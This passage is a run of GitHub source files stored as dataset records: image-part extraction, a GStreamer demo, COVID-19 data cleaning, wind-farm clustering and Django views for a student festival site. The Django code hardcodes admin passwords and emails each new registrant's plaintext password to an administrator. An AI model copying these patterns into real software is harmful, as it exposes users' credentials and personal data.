128):\n images = os.listdir(input_folder_path)\n\n # remove old files\n files_to_remove = os.listdir(target_folder_path)\n if len(files_to_remove) > 0:\n for file in files_to_remove:\n os.remove(os.path.join(target_folder_path,file))\n\n if len(images) > 0:\n for image in images:\n if not \".jpg\" in image.lower():\n continue\n img = cv2.imread(os.path.join(input_folder_path,image))\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # detects parts in the input image\n parts = cascade_model.Model.value.detectMultiScale(gray,\n cascade_model.Scale_factor.value,\n cascade_model.Min_Neighbors.value)\n\n # If it doesn't exist, create the target folder\n if not os.path.exists(target_folder_path):\n os.makedirs(target_folder_path)\n\n # save detected parts\n if len(parts) > 0:\n for i, (x, y, w, h) in enumerate(parts):\n\n # get the best width and height for being ready to resize\n if should_resize:\n w, h = get_size_ratio(w,h, (width, height))\n part = img[y:y + h, x:x + w]\n file_name = os.path.join(target_folder_path, f'{image[:-4]}-{cascade_model.Name.value}{i+1}.jpg')\n if os.path.exists(file_name):\n os.remove(file_name)\n\n # resize the photo for consistency\n if should_resize:\n part = cv2.resize(part, (width, height), interpolation=cv2.INTER_LINEAR)\n cv2.imwrite(file_name, part)\n print(file_name)\n else :\n print(image,f\"No {cascade_model.Name.value} 
detected!\")","repo_name":"mehranr7/smile-detection","sub_path":"Extract_Parts.py","file_name":"Extract_Parts.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27314388243","text":"import sys\r\nsys.path.append('C:/Users/bns36/Documents/calendar_widget/src/calendar_widget')\r\n\r\nimport tkinter\r\nfrom Calendar_Widget import Calendar\r\n\r\n\r\nroot = tkinter.Tk()\r\nroot.geometry('600x600')\r\n\r\ndef Calendar_Click():\r\n\tprint(Calendar.getdate())\r\n\r\nCalendar = Calendar(root,\r\n\tcommand = Calendar_Click,\r\n\t#width=300, # fixed issue 1\r\n\t#height=200, \r\n\t#padding=10 # fixed issue 15\r\n\t)\r\n\r\nCalendar.checkboxes(8, 4, 2023, status=True)\r\n\r\nroot.mainloop()","repo_name":"Spartanlasergun/calendar_widget","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"40438239379","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-09-20 02:07:17\n# @Last Modified time: 2016-10-05 17:32:58\n# @FileName: 198.py\n\n\nclass Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) < 1:\n return 0\n dp = [[] for x in range(len(nums))]\n dp[0] = [0, nums[0]]\n for i in range(1, len(nums)):\n dp[i] = [max(dp[i - 1][0], dp[i - 1][1]), dp[i - 1][0] + nums[i]]\n return max(dp[len(nums) - 1][0], dp[len(nums) - 1][1])\n","repo_name":"LichAmnesia/LeetCode","sub_path":"python/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18511247760","text":"# Ref: https://www.youtube.com/watch?v=HDY8pf-b1nA\n\nimport gi\ngi.require_version('Gst', '1.0')\ngi.require_version('GstApp', '1.0')\nfrom gi.repository import Gst, GstApp, GLib\nfrom threading import Thread\nfrom time import sleep\n\nGst.init()\n\nmain_loop = GLib.MainLoop()\nmain_loop_thread = Thread(target = main_loop.run)\nmain_loop_thread.start()\n\npipeline = Gst.parse_launch('v4l2src ! decodebin ! videoconvert ! 
appsink name=sink')\nappsink = pipeline.get_by_name('sink')\n\npipeline.set_state(Gst.State.PLAYING)\n\n# Wait to give enough time for pipeline to startup\n\ntry:\n while True:\n # Try to pull a sample within a second, if not give up\n sample = appsink.try_pull_sample(Gst.SECOND)\n if sample is None:\n continue\n\n print (\"I've got a sample!\")\nexcept KeyboardInterrupt:\n # Ctrl C to stop this app\n pass\n\npipeline.set_state(Gst.State.NULL)\nmain_loop.quit()\nmain_loop_thread.join()","repo_name":"digitallyamar/gst-basics","sub_path":"appsink_demo.py","file_name":"appsink_demo.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43072545438","text":"import pandas as pd\nimport numpy as np\nimport math\n\ndef drop_china_data():\n df = pd.read_csv('../DXY-COVID-19-Data/csv/DXYArea.csv')\n df = df[['continentEnglishName','countryName','countryEnglishName','provinceName','provinceEnglishName',\n 'province_confirmedCount','province_suspectedCount','province_curedCount','province_deadCount',\n 'cityName','cityEnglishName','city_confirmedCount','city_suspectedCount','city_curedCount','city_deadCount',\n 'updateTime']]\n df_woc = df[df.countryName != '中国']\n df_china = df[df.countryName == '中国']\n df_with_china = df[df.countryName == df.provinceName]\n df_woc['updateTime'] = df_woc['updateTime'].apply(lambda x:x.split()[0])\n df_china['updateTime'] = df_china['updateTime'].apply(lambda x: x.split()[0])\n df_with_china['updateTime'] = df_with_china['updateTime'].apply(lambda x: x.split()[0])\n df_china.to_csv('csv/data_china.csv')\n df_woc.to_csv('csv/data_without_china.csv')\n df_with_china.to_csv('csv/data_with_china.csv')\n return df_woc, df_china, df_with_china\n\ndef data_each_day_without_china(df_woc,date_name):\n # date_name = np.array(list(df_woc['updateTime']))\n # date_name = np.unique(date_name)\n for name in date_name:\n df_woc[df_woc.updateTime == name].drop_duplicates(subset=\"countryName\").drop(columns = ['updateTime']).to_csv('csv/date/'+name+'.csv')\n\n\ndef data_of_each_country(df_woc,date_name,china_confirmedCount , china_curedCount , china_deadCount):\n data_province_confirmedCount, data_province_deadCount , data_province_curedCount,data_province_confirmedCount_perMillion= [] ,[] ,[],[]\n country_name = np.array(list(df_woc['countryName']))\n country_name_ = df_woc[['countryName','countryEnglishName']].drop_duplicates(subset=['countryEnglishName'])\n\n # for index , row in country_name_.iterrows():\n # print(row['countryName'],row['countryEnglishName'])\n country_name = np.unique(country_name)\n\n tmp_name = np.insert(date_name,0,'Flag')\n tmp_name = np.insert(tmp_name, 0, 'Population')\n tmp_name = np.insert(tmp_name,0,'Name')\n tmp_name = np.insert(tmp_name, 0, 'English Name')\n\n # for name in country_name:\n dic_name,dic_flag = {},{}\n flag = pd.read_csv('csv/flag.csv')\n for index, row in flag.iterrows():\n flag_, country_name,countryEnglishName = row['Flag'], row['Name'],row['countryEnglishName']\n dic_name[country_name] = countryEnglishName\n dic_flag[country_name] = flag_\n\n dic_population = {}\n population = pd.read_csv('csv/population.csv')\n for index, row in population.iterrows():\n population_, country_name = row['Population'], row['Country']\n dic_population[country_name] = population_\n # print(dic_population)\n\n days = len(date_name)\n for index, row in country_name_.iterrows():\n name,English_name = row['countryName'],row['countryEnglishName']\n df_country 
= df_woc[df_woc.countryName == name].drop_duplicates(subset=\"updateTime\")\n # print (df_country)\n df_country.to_csv('csv/country/'+name+'.csv')\n\n dic_province_confirmedCount , dic_province_deadCount, dic_province_curedCount = dict.fromkeys(date_name,0),dict.fromkeys(date_name,0),dict.fromkeys(date_name,0)\n for index, row in df_country.iterrows():\n dic_province_confirmedCount[row['updateTime']] = row['province_confirmedCount']\n\n\n for index, row in df_country.iterrows():\n dic_province_deadCount[row['updateTime']] = row['province_deadCount']\n\n\n for index, row in df_country.iterrows():\n dic_province_curedCount[row['updateTime']] = row['province_curedCount']\n\n country_flag = None\n if name in dic_flag:\n country_flag = dic_flag[name]\n if type(English_name) != type('a'):\n if name in dic_name:\n English_name = dic_name[name]\n\n country_population = None\n if English_name in dic_population:\n country_population = int(dic_population[English_name].replace(',', ''))\n\n if country_population == None:\n millions = 1\n elif country_population < 1000000:\n millions = 1\n else:\n millions = country_population/1000000\n # print (millions)\n data_province_confirmedCount.append([English_name]+[name]+[country_population] +[country_flag]+ [dic_province_confirmedCount[key] for key in dic_province_confirmedCount])\n data_province_deadCount.append([English_name] + [name] +[country_population]+ [country_flag] + [dic_province_deadCount[key] for key in dic_province_deadCount])\n data_province_curedCount.append([English_name] + [name] +[country_population]+ [country_flag] + [dic_province_curedCount[key] for key in dic_province_curedCount])\n data_province_confirmedCount_perMillion.append([English_name]+[name]+[country_population] +[country_flag]+ [(dic_province_confirmedCount[key]/millions) for key in dic_province_confirmedCount])\n\n\n data_province_confirmedCount.append(['China'] + ['中国'] + [1439323776]+['https://www.countryflags.io/cn/flat/64.png'] +list(china_confirmedCount[len(china_confirmedCount)-days:]))\n data_province_deadCount.append(['China'] + ['中国'] + [1439323776]+['https://www.countryflags.io/cn/flat/64.png'] +list(china_deadCount[len(china_deadCount)-days:]))\n data_province_curedCount.append(['China'] + ['中国'] + [1439323776]+['https://www.countryflags.io/cn/flat/64.png'] +list(china_curedCount[len(china_curedCount)-days:]))\n data_province_confirmedCount_perMillion.append(['China'] + ['中国'] + [1439323776]+['https://www.countryflags.io/cn/flat/64.png'] +list(china_confirmedCount[len(china_confirmedCount)-days:]/1439323776*1000000))\n\n df_total_confirmed_case = pd.DataFrame(data_province_confirmedCount,columns= tmp_name)\n df_total_confirmed_case.to_csv('csv/global/total_confirmed_case.csv')\n\n df_total_deadCount = pd.DataFrame(data_province_deadCount, columns=tmp_name)\n df_total_deadCount.to_csv('csv/global/total_deadCount.csv')\n\n df_total_cured = pd.DataFrame(data_province_curedCount, columns=tmp_name)\n df_total_cured.to_csv('csv/global/total_curedCount.csv')\n\n df_total_confirmed_perMillion = pd.DataFrame(data_province_confirmedCount_perMillion, columns=tmp_name)\n df_total_confirmed_perMillion.to_csv('csv/global/total_confirmed_case_perMillion.csv')\n\n\ndef data_each_day_china(df_china,date_name):\n for name in date_name:\n df_china[df_china.updateTime == name].drop_duplicates(subset=\"provinceName\").drop(columns = ['cityName','cityEnglishName','city_confirmedCount','city_suspectedCount','city_curedCount','city_deadCount',\n 
'updateTime']).to_csv('csv/data_china/'+name+'.csv')\n\ndef data_china(date_name):\n df = pd.read_csv('csv/china.csv')\n total_confirmedCount = list(df['total_confirmedCount'])\n total_confirmedCount.reverse()\n\n total_curedCount = list(df['total_curedCount'])\n total_curedCount.reverse()\n\n total_deadCount = list(df['deadCount'])\n total_deadCount.reverse()\n\n return np.asarray(total_confirmedCount),np.asarray(total_curedCount),np.asarray(total_deadCount)\n\n\ndef data_usa_states():\n\n df = pd.read_csv('../covid-19-usa-by-state/COVID-19-Cases-USA-By-State.csv')\n dic_ = {}\n for index,row in df.iterrows():\n dic_[row['State']] = row.iloc[-1]\n\n df = pd.read_csv('csv/US/data_by_states.csv')\n\n df_ = pd.DataFrame(columns=['State','Total Confirmed','Current Confirmed','Total Cured','Total Death','Geometry'])\n for index,row in df.iterrows():\n # print(row)\n row['Total Confirmed'] = dic_[row['State']]\n df_.loc[index] = row\n df_.to_csv('csv/US/data_by_states.csv')\n\ndef data_world():\n df = pd.read_csv('csv/Global/total_confirmed_case.csv')\n dic_ = {}\n for index, row in df.iterrows():\n dic_[row['English Na']] = row.iloc[-1]\n # print (dic_)\n df = pd.read_csv('csv/Global/data_world.csv')\n df_ = pd.DataFrame(\n columns=['Name', 'Confirmed', 'Cured', 'Death', 'Geometry'])\n\n for index, row in df.iterrows():\n if row['Name'] in dic_:\n row['Confirmed'] = dic_[row['Name']]\n df_.loc[index] = row\n else:\n row['Confirmed'] = 'Unknown'\n df_.loc[index] = row\n\n df_.to_csv('csv/Global/data_by_countries.csv')\n\ndef data_EU():\n df = pd.read_csv('csv/Global/total_confirmed_case.csv')\n dic_ = {}\n for index, row in df.iterrows():\n dic_[row['English Na']] = row.iloc[-1]\n # print(dic_)\n df = pd.read_csv('csv/Global/data_EU.csv')\n df_ = pd.DataFrame(\n columns=['Name', 'Confirmed', 'Cured', 'Death', 'Geometry'])\n\n for index, row in df.iterrows():\n if row['Name'] in dic_:\n row['Confirmed'] = dic_[row['Name']]\n df_.loc[index] = row\n else:\n row['Confirmed'] = 'Unknown'\n df_.loc[index] = row\n\n df_.to_csv('csv/Global/data_by_countries_EU.csv')\nif __name__ == \"__main__\":\n # df_woc, df_china ,df_with_china= drop_china_data()\n #\n # date_name = np.array(list(df_woc['updateTime']))\n # date_name = np.unique(date_name)\n #\n # data_each_day_without_china(df_woc,date_name)\n # data_each_day_without_china(df_with_china,date_name)\n # data_each_day_china(df_china, date_name)\n # china_confirmedCount , china_curedCount , china_deadCount= data_china(date_name)\n # data_of_each_country(df_woc,date_name,china_confirmedCount , china_curedCount , china_deadCount)\n # data_usa_states()\n data_world()\n data_EU()\n\n","repo_name":"chedana/COVID-19","sub_path":"COVID-19 data cleaning.py","file_name":"COVID-19 data cleaning.py","file_ext":"py","file_size_in_byte":9586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32336994844","text":"import random\n# 3119222\n\nfu_data = open(r'F:\\Corpus_Set\\restaurant\\test\\neu_new.txt', 'rb')\nfu_train = open(r'F:\\Corpus_Set\\restaurant\\test\\neu_end.txt', 'wb')\n\n# for line in fu_data:\n# count += 1\n# print count\n\nneu_list = random.sample(range(3119222), 2000)\nneu_list.sort()\n\nneu_dict = dict([(word, i) for i, word in enumerate(neu_list)])\n\n\n\n\nfor i in range(3119222):\n line = fu_data.readline()\n if i in neu_dict:\n 
fu_train.write(line)\n","repo_name":"xk503775229/helloWorld","sub_path":"made_test_neu.py","file_name":"made_test_neu.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"10589025416","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import silhouette_samples,silhouette_score\n\nnpc = np.load('/home/t630/Voltage_Control/data/2015AGC/numpy_data/npwithoutnan2.npy')\nuselesslist = [18,21,22,27,34,43,44,53,56,57,58]\nl = []\nfor i in range(1,58):\n    if i not in uselesslist:\n        l.append(i)\ndf_names = pd.read_excel('/home/t630/Voltage_Control/data/2015AGC/0场站名称.xlsx',header=None)\npdc = pd.DataFrame(npc)\nl_capacity = []\nfor i in l:\n    l_capacity.append(round(df_names[4][i-1],1))\n\n\nnpc_c = npc[:,1:].T\nnpc_c = npc_c/np.array(l_capacity).reshape((47,1))\nnpc_c_mean = np.mean(npc_c,axis = 1)\nnpc_c = npc_c - npc_c_mean.reshape((47,1))\nkmeans = KMeans(n_clusters=8,max_iter=30000,n_jobs = 8)\nkmeans.fit(npc_c)\nprint(kmeans.labels_)\nprint(kmeans.inertia_)\nprint(silhouette_score(npc_c+npc_c_mean.reshape((47,1)), kmeans.labels_))\n\n'''\n# tsne to plot\nfrom sklearn.manifold import TSNE\ntsne = TSNE()\nnpc_tsne = tsne.fit_transform(npc_c)\ncolor_list = ['k^','r*','mo','y>','g*','co','bo','b<']\nfor i in range(47):\n    plt.plot(npc_tsne[i,0],npc_tsne[i,1],color_list[kmeans.labels_[i]])\nplt.show()\n\nlabels = kmeans.labels_\n#plot after cluster\nnumtoplot = 2000\nplt.figure()\nfor i in range(47):\n    plt.plot(range(numtoplot),npc[:numtoplot,i+1]/npc[:numtoplot,i+1].max())\nplt.show()\n\n\nfor i in range(8):\n    plt.figure()\n    for j in np.where(labels==i):\n        plt.plot(range(numtoplot),npc[:numtoplot,j+1]/npc[:numtoplot,j+1].max())\n    plt.title('cluster: '+str(i))\n    plt.show()\n\n\n# talking about the numbers to clusters\nc_inertias = []\nfor i in range(2,20):\n    kmeansi = KMeans(n_clusters=i,max_iter=3000,n_jobs=8)\n    kmeansi.fit(npc_c)\n    #print(kmeansi.labels_)\n    #print(kmeansi.inertia_)\n    print(silhouette_score(npc_c,kmeansi.labels_))\n    c_inertias.append(kmeansi.inertia_)\nplt.plot(range(2,20),c_inertias)\n\n\n#********dimensionality reduction**************\n#random select\nn,m = npc.shape\nallindex = range(n)\nrandom.shuffle(allindex)\nnumtoselect = 1000\nselectindex = allindex[:1000]\nselectindex.sort()\nnpc_s = npc[selectindex,:]\nnpc_s = npc_s[:,1:]\nfor i in range(47):\n    plt.figure()\n    plt.plot(range(numtoselect),npc_s[:,i]/npc_s[:,i].max())\n    plt.title(str(i))\n    plt.show()\n\nnpc_sc = npc_s.T\nnpc_sc = npc_sc/np.array(l_capacity).reshape((47,1))\nnpc_sc_mean = np.mean(npc_sc,axis = 1)\nnpc_sc = npc_sc - npc_sc_mean.reshape((47,1))\nkmeans_rs = KMeans(n_clusters=8,max_iter=30000,n_jobs = 8)\nkmeans_rs.fit(npc_sc)\nprint(kmeans_rs.labels_)\nprint(kmeans_rs.inertia_)\n'''\n#PCA\npca = PCA(n_components = 10)\npca.fit(npc_c)\nnpc_pca = pca.transform(npc_c)\nkmeans_pca = KMeans(n_clusters=8,max_iter=30000,n_jobs = 8)\nkmeans_pca.fit(npc_pca)\nlabels = kmeans_pca.labels_\nnumtoplot = 2000  # number of time samples shown in each plot\nfor i in range(8):\n    plt.figure()\n    for j in np.where(labels==i):\n        plt.plot(range(numtoplot),npc[:numtoplot,j+1]/npc[:numtoplot,j+1].max())\n    plt.title('cluster: '+str(i))\n    plt.show()\nnpc_inverse = pca.inverse_transform(npc_pca)\nnpc_inverse = npc_inverse+npc_c_mean.reshape((47,1))\nnpc_inverse = 
npc_inverse*np.array(l_capacity).reshape((47,1))\nfor i in range(47):\n plt.figure()\n plt.plot(range(numtoplot),npc[:numtoplot,i+1]/npc[:numtoplot,i+1].max())\n plt.plot(range(numtoplot),npc_inverse[i,:numtoplot]/npc_inverse[i,:numtoplot].max())\n plt.title('cluster: '+str(i))\n plt.show()\n\n\n\n\n\n\n","repo_name":"zyj0704033/Voltage_Control","sub_path":"data_mining/wind_farm_cluster.py","file_name":"wind_farm_cluster.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5877759596","text":"from django.http import Http404\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom django.views.generic import TemplateView\nfrom .models import *\nfrom user.models import *\nfrom django.contrib.auth.models import User, UserManager\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.http import JsonResponse\nfrom django.shortcuts import redirect\nfrom django.utils.crypto import get_random_string\nfrom django.core.mail import send_mail\nfrom questionnaire.models import *\nimport csv\n\nadmin_email = ['ruinedwrath@gmail.com','events@shilpiitbhu.org','eventsteam@shilpiitbhu.org']\nadmin_password = ['shilp2018','eventsshilp','teamstark']\n\ndef index(request):\n\tcontext = {}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\n\treturn render(request,'homepage/index.html',context)\n\ndef indiv(request,event_name):\n\n\t\n\tif len(event_name) > 3:\n\t\tevent_name = event_name.title().replace('_',' ')\n\t\n\tif event_name == 'Icreate':\n\t\tevent_name = 'iCreate'\n\n\tif event_name == 'Automobile And Ic Engine Design':\n\t\tevent_name = 'Automobile and IC Engine Design'\n\n\tif event_name == 'Robotics And Iot':\n\t\tevent_name = 'Robotics and IOT'\n\tcurrEvent = Event.objects.filter(name = event_name)\n\tfor event in currEvent:\n\t\tcurrEvent = event\n\t\teventDetails = event.detail_set.all()\n\t\tdetailsList = []\n\t\tfor details in eventDetails:\n\t\t\tdetailsList.append(details.detail)\n\n\tcontext = {'detailsList':detailsList,'event':currEvent}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\treturn render(request, 'homepage/individual-event.html',context)\n\ndef sign_in(request):\n\n\tif request.user.is_authenticated:\n\t\ttry:\n\t\t\tcurrUser = request.user\n\t\t\tuserProfile = currUser.profiles\n\t\t\treturn redirect(\"/dashboard\")\n\t\texcept:\n\t\t\tlogout(request)\n\t\t\treturn render(request,'homepage/login.html',{'error':\"You are trying to login with the Questionnaire Portal Team ID. 
For Round 2, both members need to individually sign up again on the website.\"})\n\n\t#request.POST['dob']\t\n\tif 'dob' in request.POST.keys():\n\t\treturn sign_up(request)\n\n\tif 'username' in request.POST.keys():\n\t\ttry:\n\t\t\tusername = request.POST['username']\n\t\t\tpassword = request.POST['password']\n\t\t\tcurrUser = authenticate(request, username=username, password=password)\n\t\t\tlogin(request,currUser)\n\t\t\treturn redirect('/dashboard')\n\t\texcept:\n\t\t\treturn render(request,'homepage/login.html',{'error':\"Username and Password do not match, or your account is not verified\"})\n\n\treturn render(request, 'homepage/login.html')\n\ndef sign_up(request):\n\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\temail = request.POST['email']\n\t#return HttpResponse(email)\n\ttry:\n\t\tcurrUser = User.objects.create_user(username=email, email=email, password=password)\n\t\tcurrUser.is_active = False\n\texcept:\n\t\treturn render(request,'homepage/login.html',{'signup_error':\"This Email Id is already registered\"})\n\n\tprofile = Profiles()\n\tprofile.user = currUser\n\tprofile.name = username\n\tprofile.mobile_no = request.POST['phone']\n\tprofile.college_name = request.POST['college']\n\tprofile.year = request.POST['year']\n\tprofile.course = request.POST['class']\n\tprofile.sex = request.POST['sex']\n\tprofile.dob = request.POST['dob'] +'-'+ request.POST['birthday_month'] +'-'+ request.POST['birthday_year'] \n\tprofile.residential_address = \"\"\n\tprofile.confirmation_code = get_random_string(length=32)\n\tprofile.num_events = 0\n\tprofile.payment_plan = \"N/A\"\n\tif email[-12:] == \"iitbhu.ac.in\" or email[-11:] == \"itbhu.ac.in\":\n\t\tprofile.num_events = 8\n\t\tprofile.payment_plan = \"Freshers\"\n\t\tprofile.payment_verified = True\n\t\tprofile.txid_submitted = True\n\t\tprofile.accomodation = True\n\t\tprofile.plan_locked = True\n\t\tprofile.money = 0\n\tprofile.ca_name = request.POST['ca-name']\n\tprofile.save()\n\tprofile.shilpid = \"SH100\"+str(profile.pk)\n\tprofile.save()\n\ttitle = \"New Registrant\"\n\tcontent = \"Hello, A new user has signed up\\n\\n The details are as below:\\n\\n\"\n\tcontent1 = \"\\nEmail id : \"+ email\n\tcontent2 = \"\\nName : \" + profile.name + \"\\nPassword: \" + password\n\tcontent3 = \"\\nShilpid : \" + profile.shilpid\n\tcontent4 = \"\\nMobile no : \"+ profile.mobile_no\n\tcontent5 = \"\\nCollege :\" + profile.college_name\n\tcontent6 = \"\\nClass and year : \" + profile.course + \",\\nyear \"+profile.year\n\tcontent7 = \"\\nCA name: \"+ profile.ca_name\n\tcontent6 = content6+content7\n\tadmin_email1 = 'shilpshobhit2018@gmail.com'\n\tadmin_email2 = 'ruinedwrath@gmail.com'\n\tcontent = content+content1 + content2 + content3 + content4 + content5 + content6\n\tsend_mail(title, content, 'admin@shilpiitbhu.org',[admin_email1], fail_silently=True)\n\t#send_mail(title, content, 'admin@shilpiitbhu.org',[admin_email2], fail_silently=False)\n\n\n\tcurrUser.save()\n\ttry:\n\t\tsend_registration_confirmation(currUser)\n\texcept:\n\t\treturn render(request,'homepage/login.html',{'redirect':\"Error!!! The verification email could not be sent to your registered email\"})\n\n\t#login(request,currUser)\n\treturn render(request,'homepage/login.html',{'redirect':\"Congratulations!!! 
An email has been sent to your registered email for verification\"})\n\ndef send_registration_confirmation(user):\n\tp = user.profiles\n\ttitle = \"Registration successful for Shilp 2018\"\n\tcontent_url = \"www.shilpiitbhu.org/confirmation/\" + p.shilpid + \"/\" + str(p.confirmation_code)\n\n\tcontent1 = \"Hello \" + p.name + \",\\n\\nGreetings from Team Shilp!\\n\\nWe are happy to inform you that you have successfully registered for Shilp'18.\"\n\tcontent2 = \"\\nClick on the following link to verify your account:\\n\"\n\tcontent3 = content_url\n\tcontent4 = \"\\n\\nFeel free to explore our website for further details and select the participation package as per your preferences.\"\n\tcontent5 = \"\\n\\nIn case you have any queries, feel free to contact us, we'll be happy to help you!\\n\"\n\tcontent6 = \"\\n\\nBest Wishes,\\nTeam Shilp\\nIIT(BHU) Varanasi.\"\n\n\tcontent = content1 + content2 + content3 + content4 + content5 + content6\n\tsend_mail(title, content, 'admin@shilpiitbhu.org', [user.email], fail_silently=True)\n\ndef confirm(request, username, confirmation_code):\n\tprofile = Profiles.objects.get(shilpid = username)\n\tuser = profile.user\n\tif profile.confirmation_code == confirmation_code and confirmation_code != '-1':\n\t\tprofile.confirmation_code = \"-1\"\n\t\tuser.is_active = True\n\t\tuser.save()\n\t\tlogin(request,user)\n\treturn redirect(\"/dashboard/RegPlan/\")\n\n\ndef allevents(request):\n\tcontext = {}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\n\treturn render(request,'homepage/allevents.html',context)\n\ndef hospi(request):\n\tcontext = {}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\n\treturn render(request,'homepage/hospitality.html',context)\n\ndef dashboard(request):\n\treturn render(request,'homepage/allevents.html')\n\ndef team(request):\n\tcontext = {}\n\tif not request.user.is_authenticated:\n\t\tcontext['if_auth'] = False\n\telse :\n\t\tcontext['if_auth'] = True\n\n\treturn render(request,'homepage/team.html',context)\n\t\ndef signout(request):\n\tlogout(request)\n\treturn redirect('/')\n\ndef download_users(request):\n\n\tif not request.user.is_staff:\n\t\treturn HttpResponse(\"Permission Denied\")\n\n\tresponse = HttpResponse(content_type='text/csv')\n\tresponse['Content-Disposition'] = 'attachment; filename=\"user_registrations.csv\"'\n\tall_users = Profiles.objects.all()\n\twriter = csv.writer(response)\n\trow = ['S No.','email']\n\ti=0\n\tfor item in all_users:\n\t\tif i==0:\n\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\tif attrib != 'user_id' and attrib !='_state' and attrib !='id':\n\t\t\t\t\trow.append(attrib.title().replace('_',' '))\n\t\t\twriter.writerow(row)\n\t\ti=i+1\n\t\trow = [i]\n\t\trow.append(item.user.email)\n\t\tfor attrib,value in item.__dict__.items():\n\t\t\tif attrib != 'user_id' and attrib != '_state' and attrib !='id':\n\t\t\t\trow.append(value)\n\t\twriter.writerow(row)\n\treturn response\n\ndef download_hospi(request):\n\n\tif not request.user.is_staff:\n\t\treturn HttpResponse(\"Permission Denied\")\n\n\tresponse = HttpResponse(content_type='text/csv')\n\tresponse['Content-Disposition'] = 'attachment; filename=\"accod_registrations.csv\"'\n\tall_users = Profiles.objects.all()\n\twriter = csv.writer(response)\n\trow = ['S No.']\n\ti=0\n\n\tfor item in all_users:\n\t\tw_flag=0\n\t\tif i==0:\n\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\t# columns exported for the accommodation sheet\n\t\t\t\tif attrib in ('name', 'mobile_no', 'sex', 'shilpid', 'payment_verified', 'payment_plan', 'accomodation'):\n\t\t\t\t\trow.append(attrib.title().replace('_',' '))\n\t\t\trow.append('Workshop')\n\t\t\twriter.writerow(row)\n\t\ti=i+1\n\t\trow = [i]\n\t\tfor attrib,value in item.__dict__.items():\n\t\t\tif attrib in ('name', 'mobile_no', 'sex', 'shilpid', 'payment_verified', 'payment_plan', 'accomodation'):\n\t\t\t\tif attrib == 'accomodation':\n\t\t\t\t\tif value == True:\n\t\t\t\t\t\tw_flag=1\n\t\t\t\tif w_flag == 1:\n\t\t\t\t\tif attrib == 'payment_plan':\n\t\t\t\t\t\tif value == \"Workshop Accomodation (1 day)\" or value == \"Workshop Accomodation (2 day)\" or value == \"Workshop Accomodation (3 day)\" :\n\t\t\t\t\t\t\tworkshop=\"Yes\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tworkshop=\"No\"\n\n\t\t\t\t\trow.append(value)\n\t\tif w_flag == 1:\n\t\t\trow.append(workshop)\n\t\twriter.writerow(row)\n\treturn response\n\ndef download_quiz(request):\n\n\tif not request.user.is_staff:\n\t\treturn HttpResponse(\"Permission Denied\")\n\n\tresponse = HttpResponse(content_type='text/csv')\n\tresponse['Content-Disposition'] = 'attachment; filename=\"quiz_registrations.csv\"'\n\tall_teams = Quiz_Team.objects.all()\n\twriter = csv.writer(response)\n\trow = ['S No.']\n\ti=0\n\tfor item in all_teams:\n\t\tif i==0:\n\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\tif attrib != '_state' and attrib != 'password' :\n\t\t\t\t\trow.append(attrib.title().replace('_',' '))\n\t\t\trow.append('Internal')\n\t\t\twriter.writerow(row)\n\t\ti=i+1\n\t\trow = [i]\n\t\tfor attrib,value in item.__dict__.items():\n\t\t\tif attrib != '_state' and attrib != 'password' :\n\t\t\t\tif attrib == 'leader_email':\n\t\t\t\t\tif value[-12:] == \"iitbhu.ac.in\" or value[-11:] == \"itbhu.ac.in\":\n\t\t\t\t\t\tinternal=\"Yes\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tinternal=\"No\"\n\n\t\t\t\trow.append(value)\n\t\trow.append(internal)\n\t\twriter.writerow(row)\n\treturn response\n\ndef get_teams(request,event):\n\tif not request.user.is_staff:\n\t\treturn HttpResponse(\"Permission Denied\")\n\n\tresponse = HttpResponse(content_type='text/csv')\n\tresponse['Content-Disposition'] = 'attachment; filename=\"quiz_registrations.csv\"'\n\tall_teams = Team.objects.all()\n\twriter = csv.writer(response)\n\trow = ['S No.']\n\ti=0\n\tevent = event.title().replace('_',' ')\n\tfor item in all_teams:\n\t\tif item.event != event:\n\t\t\tcontinue\n\t\ttry:\n\t\t\tleader = Profiles.objects.get(shilpid=item.member1)\n\t\t\tif i==0:\n\t\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\t\tif attrib != 